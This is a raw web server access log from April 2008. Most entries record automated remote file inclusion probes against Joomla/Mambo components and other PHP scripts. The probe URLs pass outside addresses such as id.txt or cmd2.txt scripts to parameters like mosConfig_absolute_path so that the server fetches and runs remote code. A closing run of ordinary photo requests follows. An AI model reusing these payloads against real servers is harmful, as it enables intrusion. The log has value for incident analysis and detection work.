193.145.28.20 - - [29/Apr/2008:10:12:02 -0700] "GET /logs/?mosConfig_absolute_path=http://www.taow.net/league/id.txt? HTTP/1.1" 200 45268 "-" "libwww-perl/5.65" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:10:12:04 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:10:12:04 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:10:12:04 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
193.200.113.18 - - [29/Apr/2008:10:12:06 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.251.123 - - [29/Apr/2008:10:12:06 -0700] "GET /logs/access.log//errors.....ng/upload/trem/oldbisok??//forums//index.php?name=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.114.133.81 - - [29/Apr/2008:10:12:07 -0700] "GET /logs/access_080205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.teploobmen.ru/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.81 - - [29/Apr/2008:10:12:07 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.teploobmen.ru/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.81 - - [29/Apr/2008:10:12:08 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.teploobmen.ru/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.14.1.101 - - [29/Apr/2008:10:12:11 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.studio-wave.com/concept/images/colour.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
195.14.1.101 - - [29/Apr/2008:10:12:11 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.studio-wave.com/concept/images/colour.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
193.200.113.18 - - [29/Apr/2008:10:12:11 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.200.113.18 - - [29/Apr/2008:10:12:12 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.67.51 - - [29/Apr/2008:10:12:20 -0700] "GET /logs/access_080201.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:12:31 -0700] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.34.200.250 - - [29/Apr/2008:10:12:33 -0700] "GET /logs/access_080215.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:12:33 -0700] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:12:34 -0700] "GET //skin/zero_vote/error.php?dir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.200.250 - - [29/Apr/2008:10:12:36 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
64.34.200.250 - - [29/Apr/2008:10:12:36 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45276 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:12:39 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:12:39 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.200.113.18 - - [29/Apr/2008:10:12:40 -0700] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:12:41 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:12:41 -0700] "GET //skin/zero_vote/error.php?dir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:12:42 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:12:43 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:10:12:54 -0700] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:10:12:59 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:10:13:00 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:13:06 -0700] "GET //skin/zero_vote/error.php?dir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:10:13:12 -0700] "GET //skin/zero_vote/error.php?dir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:13:21 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:13:21 -0700] "GET //skin/zero_vote/error.php?dir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:13:21 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:13:41 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:13:42 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:13:42 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:13:48 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:10:13:55 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fadhilla.com/program/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:10:13:56 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:10:13:56 -0700] "GET //skin/zero_vote/error.php?dir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:10:13:56 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.32.68.172 - - [29/Apr/2008:10:13:58 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:13:58 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
92.48.75.104 - - [29/Apr/2008:10:13:59 -0700] "GET /logs/index.php?go=http://www.stiri-mondene.com//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.124.100 - - [29/Apr/2008:10:13:59 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.los-chamos.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.124.100 - - [29/Apr/2008:10:13:59 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.los-chamos.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:10:13:59 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fadhilla.com/program/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
89.108.124.100 - - [29/Apr/2008:10:14:00 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.los-chamos.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.32.68.172 - - [29/Apr/2008:10:14:03 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.106.117 - - [29/Apr/2008:10:14:09 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.106.117 - - [29/Apr/2008:10:14:09 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
92.48.75.104 - - [29/Apr/2008:10:14:10 -0700] "GET /index.php?go=http://www.stiri-mondene.com//id.txt??? HTTP/1.1" 200 11607 "-" "libwww-perl/5.811" "www.dmulk.com"
72.32.68.172 - - [29/Apr/2008:10:14:10 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 200 11607 "-" "libwww-perl/5.79" "www.dmulk.com"
216.27.59.13 - - [29/Apr/2008:10:14:13 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/cmd182182/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:14:32 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:14:32 -0700] "GET //skin/zero_vote/error.php?dir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.32.68.172 - - [29/Apr/2008:10:14:35 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:14:36 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:14:36 -0700] "GET //skin/zero_vote/error.php?dir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:14:36 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.234.133.173 - - [29/Apr/2008:10:14:38 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.taow.net/league/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Apr/2008:10:14:39 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.taow.net/league/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Apr/2008:10:14:40 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.taow.net/league/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:10:14:41 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.132.204.166 - - [29/Apr/2008:10:14:55 -0700] "GET /logs/access_080215.log//includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.132.204.166 - - [29/Apr/2008:10:14:55 -0700] "GET //includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.132.204.166 - - [29/Apr/2008:10:14:56 -0700] "GET /logs//includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.141.117.79 - - [29/Apr/2008:10:15:03 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.255.3.207 - - [29/Apr/2008:10:15:17 -0700] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://163.21.14.134/appserv/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.124.100 - - [29/Apr/2008:10:15:24 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://forum.radiojohn.nl/auction/images/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.124.100 - - [29/Apr/2008:10:15:24 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://forum.radiojohn.nl/auction/images/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.124.100 - - [29/Apr/2008:10:15:24 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://forum.radiojohn.nl/auction/images/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.81 - - [29/Apr/2008:10:15:26 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.teploobmen.ru/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:15:33 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.132.204.166 - - [29/Apr/2008:10:15:34 -0700] "GET /logs/access_080215.log//includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.132.204.166 - - [29/Apr/2008:10:15:34 -0700] "GET //includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.132.204.166 - - [29/Apr/2008:10:15:35 -0700] "GET /logs//includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
159.27.254.222 - - [29/Apr/2008:10:15:38 -0700] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.0" 200 93210 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
159.27.254.222 - - [29/Apr/2008:10:15:38 -0700] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.0" 200 75886 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
159.27.254.222 - - [29/Apr/2008:10:15:38 -0700] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.0" 200 85422 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
159.27.254.222 - - [29/Apr/2008:10:15:38 -0700] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.0" 200 76584 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
159.27.254.222 - - [29/Apr/2008:10:15:39 -0700] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.0" 200 73896 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
159.27.254.222 - - [29/Apr/2008:10:15:40 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4359M.JPG HTTP/1.0" 200 106754 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
159.27.254.222 - - [29/Apr/2008:10:15:40 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4360M.JPG HTTP/1.0" 200 108624 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
159.27.254.222 - - [29/Apr/2008:10:15:40 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4364M.JPG HTTP/1.0" 200 94330 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
159.27.254.222 - - [29/Apr/2008:10:15:40 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4365M.JPG HTTP/1.0" 200 105802 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
62.84.188.7 - - [29/Apr/2008:10:15:40 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
159.27.254.222 - - [29/Apr/2008:10:15:41 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4362M.JPG HTTP/1.0" 200 102833 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
159.27.254.222 - - [29/Apr/2008:10:15:41 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4367M.JPG HTTP/1.0" 200 83489 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
159.27.254.222 - - [29/Apr/2008:10:15:41 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4366M.JPG HTTP/1.0" 200 86979 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
159.27.254.222 - - [29/Apr/2008:10:15:41 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4374M.JPG HTTP/1.0" 200 114637 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
159.27.254.222 - - [29/Apr/2008:10:15:42 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4375M.JPG HTTP/1.0" 200 85908 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
159.27.254.222 - - [29/Apr/2008:10:15:42 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4377M.JPG HTTP/1.0" 200 87820 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
159.27.254.222 - - [29/Apr/2008:10:15:42 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4376M.JPG HTTP/1.0" 200 78015 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
159.27.254.222 - - [29/Apr/2008:10:15:43 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4378M.JPG HTTP/1.0" 200 87412 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
159.27.254.222 - - [29/Apr/2008:10:15:43 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4379M.JPG HTTP/1.0" 200 84804 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
159.27.254.222 - - [29/Apr/2008:10:15:43 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4369M.JPG HTTP/1.0" 200 102059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
159.27.254.222 - - [29/Apr/2008:10:15:43 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4380M.JPG HTTP/1.0" 200 83650 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
159.27.254.222 - - [29/Apr/2008:10:15:44 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4381M.JPG HTTP/1.0" 200 98779 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
159.27.254.222 - - [29/Apr/2008:10:15:44 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4383M.JPG HTTP/1.0" 200 88967 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
159.27.254.222 - - [29/Apr/2008:10:15:45 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4384M.JPG HTTP/1.0" 200 96561 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
159.27.254.222 - - [29/Apr/2008:10:15:45 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4385M.JPG HTTP/1.0" 200 94524 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
